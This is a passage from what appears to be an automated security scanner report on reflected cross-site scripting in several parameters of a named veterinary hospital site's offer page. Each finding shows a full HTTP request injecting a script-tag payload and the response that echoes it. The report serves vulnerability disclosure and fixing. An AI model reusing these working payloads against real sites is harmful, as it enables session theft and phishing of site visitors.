GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=141be"><script>alert(1)</script>908e5de26cc&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=cuk6kin33gemm42a0q0adqee65; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=141be"><script>alert(1)</script>908e5de26cc&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3
...[SNIP]...

2.39. http://www.vcahospitals.com/main/offer [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the r request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd45"><script>alert(1)</script>a545781095a was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13fbd45"><script>alert(1)</script>a545781095a&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:03:51 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=vjr1h35soi9lhsqsn64d78ocd1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13fbd45"><script>alert(1)</script>a545781095a&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.40. http://www.vcahospitals.com/main/offer [referer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df6e8"><script>alert(1)</script>093b3b8f1c4 was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=df6e8"><script>alert(1)</script>093b3b8f1c4&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:01 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=g8pte6n4esqiq4spacl1mgj7g0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=df6e8"><script>alert(1)</script>093b3b8f1c4&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname
...[SNIP]...

2.41. http://www.vcahospitals.com/main/offer [state parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a4e4"><script>alert(1)</script>eea3abc545b was submitted in the state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?=3&state=FL2a4e4"><script>alert(1)</script>eea3abc545b&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:57 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3&state=FL2a4e4"><script>alert(1)</script>eea3abc545b&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.42. http://www.vcahospitals.com/main/offer [submit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82bfe"><script>alert(1)</script>eac88d58519 was submitted in the submit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon82bfe"><script>alert(1)</script>eac88d58519&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hhabg9v3lhlbkflav80vstra25; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon82bfe"><script>alert(1)</script>eac88d58519&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3
...[SNIP]...

2.43. http://www.vcahospitals.com/main/offer [token parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de71"><script>alert(1)</script>cc1ba56418e was submitted in the token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc7de71"><script>alert(1)</script>cc1ba56418e&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=eq5ak2i8c2d6bskvfdik8qphb5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
88BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc7de71"><script>alert(1)</script>cc1ba56418e&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%2
...[SNIP]...

2.44. http://www.vcahospitals.com/main/offer [tollfree parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the tollfree request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e9e"><script>alert(1)</script>8361d0a233a was submitted in the tollfree parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

